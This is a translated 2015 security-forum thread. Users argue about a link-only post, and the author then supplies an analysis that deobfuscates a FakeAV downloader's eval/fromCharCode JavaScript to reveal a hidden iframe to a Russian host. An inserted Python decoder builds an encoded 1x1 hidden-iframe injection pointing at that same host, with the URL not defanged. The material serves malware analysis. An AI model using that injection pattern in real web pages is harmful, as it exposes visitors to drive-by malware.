Aerosol, posted February 25, 2015

Summary:
1. Thanks for the sample file(s)
2. First view
3. Second view
4. More
Read more: http://dl.packetstormsecurity.net/papers/virus/fakeav-downloader-analysis.pdf
Guest, posted February 28, 2015 (edited)

Summary:
1. Thanks for the sample file(s)
2. First view
3. Second view
4. More
Read more: http://dl.packetstormsecurity.net/papers/virus/fakeav-downloader-analysis.pdf

WTF man ... so I'm starting to agree with those who say you post just to get noticed. What kind of crap topic is this, with 4 lines in it? Put at least some basic info about the subject you're presenting; what you've done now is a joke, the way I see it. No offence, but this is too much. It's as if a news story about potatoes with cheese came out and, instead of telling you about it here, I made a topic with:
1. Go to google.ro
2. Type "potatoes with cheese"
3. Read the story on timpul.md.
Google.

Edited February 28, 2015 by AGSQ
Aerosol (author), posted February 28, 2015 (edited)

@AGSQ By the way, if you had read the article you would have seen that it isn't a news story, plus it's a .PDF document; I wasn't going to sit and take screenshots just so you could read the article on rst without clicking the link. (Try not to post just for the sake of it.)

Edited February 28, 2015 by Aerosol
Guest, posted February 28, 2015

@AGSQ I posted the link for whoever is interested. If you're not interested, please don't comment. Thank you.

Man, are you thick? The whole idea of posting something, of sharing something with the users on the forum, is to give them as much information as possible about that thing. Was it hard for you to copy-paste what's in that PDF and then lay the post out nicely with the corresponding images? I don't want you to take it personally; at the end of the day I have nothing against you, you could drop dead tomorrow and I wouldn't start crying over you, but the point was that you make pointless posts just to run up the count. Offer information if you have any to offer; if not, refrain. It's quite ugly and annoying, especially for those of us who have RSS enabled.
PS: A pretty good joke:
Aerosol (author), posted February 28, 2015 (edited)

1. Thanks for the sample file(s)
After writing my last article about malware analysis for Android[1], I decided to check some threats that may come from webpages. Today we can see more advertisement on the web than a few years ago. In the case of malicious pages, the "advertisements" added there will now more often than not try to steal your data by installing some malware on your computer or by redirecting you to a webpage containing exploit code for your browser (or its plugin). A few nice examples of "webpages" like this I found (again) on Mila's great blog[0]. Thanks again! (Hint: Don't ask me for the password. Ask Mila via email.)
Let's check the first archive with an HTML file, named "FakeAV Downloader".

2. First view
After unpacking our HTML sample, we can see that the index.html file contains HTML and JavaScript code. Let's copy the JavaScript code to a new file and save it as "ob1.html". Now we can clean the code up a little to see what is going on here:
As you can see, the JS code is preparing "eval()" and "fromCharCode()" to use later (with "n"):

3. Second view
When I was trying to figure out how to deobfuscate this code, I found a link to a very nice tool called JSDetox[2]. You can install it on Kali[4], but if there is any problem with installation via "bundler", try to install each package manually (gem). It should help.
After uploading our sample index.html to JSDetox, we can start deobfuscation ("Analyse") and get the results in a few seconds:
Now we can see where the newly created <iframe> tag is trying to relocate us. The iframe page is located at:
hxxp://hivagdy.ru/count22.php.
Unfortunately, when I was checking this code, the RU hostname was unavailable.
After that, I found some other interesting information, for example:
a) Correlation network topology[3]
This host was used for: [5]
c) and one more piece of information:
So it seems now that we have all the information we need to decide that this index.html file (used in a phishing campaign, for example) can be very dangerous for the safety of our users/clients.

4. More
Again, big thanks for the sample files! If you have more, post the link(s) in the comments or send me an email with the subject "MALWARE". Please remember to pack it with the password 'infected' (zip/rar/whatever). (Without the password, the email server will drop them.)

Materials described here:
[0] Mila's blog - contagio
[1] Android first steps in malware's world - Haunt IT: [PL] Analiza aplikacji atticlab.bodyscanner.apk
[2] JSDetox - https://github.com/svent/jsdetox
[3] Exposure ISEC Lab - Exposure - Malicious DNS world activity
[4] Kali Linux - https://www.kali.org
[5] http://files.deependresearch.org
[6] Malware URL - http://www.malwareurl.com
Source

Specially for Mr. @AGSQ, who couldn't click on a link. I'm sorry, sir, that I took the liberty of posting the link to save 5 minutes of taking screenshots plus another 10 of editing... I hope you understand this article better now (though I doubt you understood it).

Edited February 28, 2015 by Aerosol
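The article above decodes the eval()/String.fromCharCode() layer with JSDetox to reveal the injected iframe. The following is an added example, not code from the original post or from the paper: a small static decoder that does the same unwrapping without executing anything, and goes a bit further by resolving aliases of String.fromCharCode and peeling nested layers. The obfuscated script it works on is constructed here around the iframe target the article reports; the alias names e and n are assumptions.

```python
"""Static decoder for eval()/String.fromCharCode() JavaScript obfuscation."""
import re
from typing import List


def _codes(s: str) -> str:
    """Turn text into the comma-separated char codes fromCharCode() expects."""
    return ",".join(str(ord(c)) for c in s)


# Constructed sample (not the article's script): eval() and String.fromCharCode()
# are aliased to e/n, then an <iframe> injection is wrapped in two layers.
_INNER = ("document.write('<iframe src=\"http://hivagdy.ru/count22.php\" "
          "width=1 height=1></iframe>');")
_LAYER1 = "e(n(" + _codes(_INNER) + "));"
SAMPLE_JS = "var e=eval,n=String.fromCharCode;\ne(n(" + _codes(_LAYER1) + "));\n"

_ALIAS_RE = re.compile(r"(\w+)\s*=\s*String\.fromCharCode\b")
_IFRAME_RE = re.compile(r"<iframe[^>]*\bsrc\s*=\s*[\"']([^\"']+)", re.I)


def fromcharcode_aliases(js: str) -> List[str]:
    """Names under which String.fromCharCode is reachable in this script."""
    return ["String.fromCharCode"] + _ALIAS_RE.findall(js)


def decode_charcode_calls(js: str, max_rounds: int = 8) -> str:
    """Replace each alias(12,34,...) call by the text it decodes to.

    Repeats so nested layers unwrap, stopping when a pass changes nothing.
    Nothing is executed, so the sample can be inspected without a sandbox."""
    names = "|".join(re.escape(n) for n in fromcharcode_aliases(js))
    call_re = re.compile(r"(?<![\w.])(?:%s)\s*\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)" % names)
    for _ in range(max_rounds):
        new = call_re.sub(
            lambda m: "".join(chr(int(x)) for x in m.group(1).split(",")), js)
        if new == js:
            break
        js = new
    return js


def defang(url: str) -> str:
    """Make a URL safe to paste into a report (hxxp, [.])."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def iframe_targets(js: str) -> List[str]:
    """Defanged src of every <iframe> the decoded script would inject."""
    return [defang(u) for u in _IFRAME_RE.findall(decode_charcode_calls(js))]
```

Running decode_charcode_calls(SAMPLE_JS) leaves the nested eval aliases in place around the recovered document.write(), so the analyst still sees how many layers the script used.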
Guest, posted February 28, 2015

It's not about saving time but about helping the community. Both for existing members and for new ones, who have a better chance of finding the forum through a 500-word tag cloud than a 10-word one.
Last reply.